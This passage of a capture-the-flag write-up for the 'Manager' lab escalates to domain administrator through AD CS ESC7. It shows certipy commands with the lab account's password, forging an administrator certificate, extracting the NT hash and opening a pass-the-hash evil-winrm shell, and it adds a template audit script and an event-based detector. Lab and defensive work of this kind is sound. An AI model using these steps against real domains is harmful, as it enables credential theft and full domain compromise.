    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication, Smart Card Logon
    mspki-certificate-application-policy  : Client Authentication, Server Authentication, Smart Card Logon
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Domain Controllers    S-1-5-21-4078382237-1492182817-2568127209-516
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
                                      MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

    CA Name                               : dc01.manager.htb\manager-DC01-CA
    Template Name                         : DirectoryEmailReplication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Directory Service Email Replication
    mspki-certificate-application-policy  : Directory Service Email Replication
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Domain Controllers    S-1-5-21-4078382237-1492182817-2568127209-516
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
                                      MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

    CA Name                               : dc01.manager.htb\manager-DC01-CA
    Template Name                         : KerberosAuthentication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
    mspki-certificate-application-policy  : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Domain Controllers    S-1-5-21-4078382237-1492182817-2568127209-516
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
                                      MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:08.5889780

Most of these are default templates, but one stands out: SubCA. Anyone who has read the HackTricks page on AD CS domain escalation (quoted below) will recognise that ESC7 - Attack2 looks feasible here.

The technique relies on the fact that users with the Manage CA and Manage Certificates access right can issue failed certificate requests. The SubCA certificate template is vulnerable to ESC1, but only administrators can enroll in the template. Thus, a user can request to enroll in the SubCA - which will be denied - but then issued by the manager afterwards.

This requires access rights on the CA itself, but it is worth a try.
If the first command fails, that simply means we lack the rights and we move on to another attack vector.
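As an added example (not from the original writeup): a small audit script that reads a Certify template dump in the layout shown above and flags templates with the ESC1 shape, listing who may enroll. On this dump SubCA comes out as "enrollee-supplied subject, but admin-only", which is exactly what makes it the ESC7 target. The input is a constructed excerpt in the same layout with SIDs shortened.

```python
import re
# Constructed excerpt in the layout of the Certify dump above (SIDs shortened).
SAMPLE = """\
    CA Name                               : dc01.manager.htb\\manager-DC01-CA
    Template Name                         : SubCA
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    pkiextendedkeyusage                   : <null>
        Enrollment Rights           : MANAGER\\Domain Admins         S-1-5-21-1-512
                                      MANAGER\\Enterprise Admins     S-1-5-21-1-519
        Owner                       : MANAGER\\Enterprise Admins     S-1-5-21-1-519
    CA Name                               : dc01.manager.htb\\manager-DC01-CA
    Template Name                         : DomainControllerAuthentication
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
        Enrollment Rights           : MANAGER\\Domain Controllers    S-1-5-21-1-516
"""
AUTH_EKUS = {"Client Authentication", "Smart Card Logon", "PKINIT Client Authentication", "Any Purpose"}
KV = re.compile(r"^\s*([A-Za-z][^:]*?)\s*:\s*(.*)$")    # "key : value" lines
PRINCIPAL = re.compile(r"^\s+(\S.*?)\s*(S-1-[\d-]+)$")   # "name  SID" lines (SID may touch the name)

def parse_templates(text):
    templates = []   # one dict per template; 'Enrollment Rights' gathers principals across lines
    for block in filter(str.strip, re.split(r"(?m)^(?=[ \t]*CA Name[ \t]*:)", text)):
        t, section = {"Enrollment Rights": []}, None
        for line in block.splitlines():
            m = KV.match(line)
            if m:
                section = m.group(1)
                if section != "Enrollment Rights":
                    t[section] = m.group(2)
                    continue
                line = "  " + m.group(2)                  # first principal sits after the colon
            p = PRINCIPAL.match(line)
            if p and section == "Enrollment Rights":      # continuation lines carry more principals
                t["Enrollment Rights"].append(p.group(1))
        templates.append(t)
    return templates

def audit(text):
    """Flag the ESC1 shape: enrollee-supplied subject, auth-capable EKU, no approval or co-signature."""
    findings = []
    for t in parse_templates(text):
        ekus = {e.strip() for e in t.get("pkiextendedkeyusage", "").split(",")}
        auth_capable = "<null>" in ekus or bool(ekus & AUTH_EKUS)   # no EKU at all = any purpose
        if ("ENROLLEE_SUPPLIES_SUBJECT" in t.get("msPKI-Certificate-Name-Flag", "")
                and "PEND_ALL_REQUESTS" not in t.get("mspki-enrollment-flag", "")
                and t.get("Authorized Signatures Required", "0") == "0" and auth_capable):
            findings.append({"template": t["Template Name"], "enrollers": t["Enrollment Rights"]})
    return findings
```

A finding whose enrollers are only admin groups is not directly ESC1, but it is exactly the template an ESC7 officer can push through after a denied request.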

ADCS - ESC7

While checking whether we have access rights on the CA, we also note down the ID of the request that gets denied.

┌──(root㉿kali)-[~/work]
└─# certipy ca -ca 'manager-DC01-CA' -add-officer raven -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -debug && certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -debug && certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -template SubCA -upn 'administrator@manager.htb' -debug
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'MANAGER.HTB' at '192.168.40.1'
[+] Resolved 'MANAGER.HTB' from cache: 10.129.144.30
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.129.144.30:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.129.144.30
[*] User 'Raven' already has officer rights on 'manager-DC01-CA'
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'MANAGER.HTB' at '192.168.40.1'
[+] Resolved 'MANAGER.HTB' from cache: 10.129.144.30
[+] Trying to get DCOM connection for: 10.129.144.30
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.129.144.30:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'dc01.manager.htb' at '192.168.40.1'
[+] Trying to resolve 'MANAGER.HTB' at '192.168.40.1'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.144.30[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.144.30[\pipe\cert]
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 14
Would you like to save the private key? (y/N) y
[*] Saved private key to 14.key
[-] Failed to request certificate

It worked!
Using that ID, we now have the CA issue the certificate and fetch it.
If this fails, run ntpdate 10.129.144.30 to sync the clock with the box.

┌──(root㉿kali)-[~/work]
└─# certipy ca -ca 'manager-DC01-CA' -issue-request 14 -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -debug && certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -retrieve 14 -debug
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'MANAGER.HTB' at '192.168.40.1'
[+] Resolved 'MANAGER.HTB' from cache: 10.129.144.30
[+] Trying to get DCOM connection for: 10.129.144.30
[-] Got access denied trying to issue certificate
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'dc01.manager.htb' at '192.168.40.1'
[+] Trying to resolve 'MANAGER.HTB' at '192.168.40.1'
[*] Rerieving certificate with ID 14
[+] Trying to connect to endpoint: ncacn_np:10.129.144.30[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.144.30[\pipe\cert]
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '14.key'
[*] Saved certificate and private key to 'administrator.pfx'

We got the certificate. Now we authenticate with it.
If it fails, run ntpdate as above.

┌──(root㉿kali)-[~/work]
└─# certipy auth -pfx administrator.pfx -dc-ip 10.129.144.30
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

We have the hash, so we pass-the-hash!

┌──(root㉿kali)-[~]
└─# evil-winrm -i 10.129.144.30 -u Administrator -H ae5064c2f62317332c88629e025924ef
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

With that we captured the Administrator flag!
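As an added example from the defender's side (not part of the original writeup): detection logic for the trace the steps above leave on the CA, a request denied by template permissions and then issued anyway, with a certificate naming an account other than the requester. The records are constructed in a simplified shape of my own; only the event IDs are the real Certificate Services audit IDs.

```python
from collections import defaultdict

# Constructed, simplified CA audit records: not real Windows event text, and the field names are
# my own.  The IDs are the Certificate Services audit events: 4886 request received,
# 4888 request denied, 4887 request approved and certificate issued.
EVENTS = [
    {"ts": 1, "id": 4886, "actor": "MANAGER\\raven", "req": 14, "template": "SubCA", "upn": "administrator@manager.htb"},
    {"ts": 2, "id": 4888, "actor": "MANAGER\\raven", "req": 14, "template": "SubCA"},
    {"ts": 3, "id": 4887, "actor": "MANAGER\\raven", "req": 14, "template": "SubCA", "upn": "administrator@manager.htb"},
    {"ts": 4, "id": 4886, "actor": "MANAGER\\DC01$", "req": 15, "template": "KerberosAuthentication"},
    {"ts": 5, "id": 4887, "actor": "MANAGER\\DC01$", "req": 15, "template": "KerberosAuthentication"},
]

def detect_issue_after_denial(events):
    """One alert per request the CA denied (4888) and later issued anyway (4887): the ESC7 sequence,
    where a certificate officer resubmits a request that template permissions had rejected."""
    by_req = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):      # group the per-request lifecycle in order
        by_req[e["req"]].append(e)
    alerts = []
    for req, seq in by_req.items():
        ids = [e["id"] for e in seq]
        if 4888 not in ids or 4887 not in ids or ids.index(4887) < ids.index(4888):
            continue                                      # normal flow: issued without a denial
        issued = seq[ids.index(4887)]
        requester = issued["actor"].split("\\")[-1].lower()
        upn_user = issued.get("upn", "").split("@")[0].lower()
        alerts.append({
            "request_id": req,
            "requester": issued["actor"],
            "template": issued["template"],
            # the ESC1 half of the chain: the certificate names someone other than the requester
            "upn_mismatch": bool(upn_user) and upn_user != requester,
        })
    return alerts

if __name__ == "__main__":
    for a in detect_issue_after_denial(EVENTS):
        print(f"request {a['request_id']} ({a['template']}) issued after denial for "
              f"{a['requester']}; UPN mismatch: {a['upn_mismatch']}")
```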

Summary

Privilege escalation succeeded and we obtained Administrator rights.
I dislike brute-forcing, so the very first step was the hardest part.
Everything after that was AD CS privilege escalation, which went smoothly.

I hope this is of help to fellow security engineers once again.
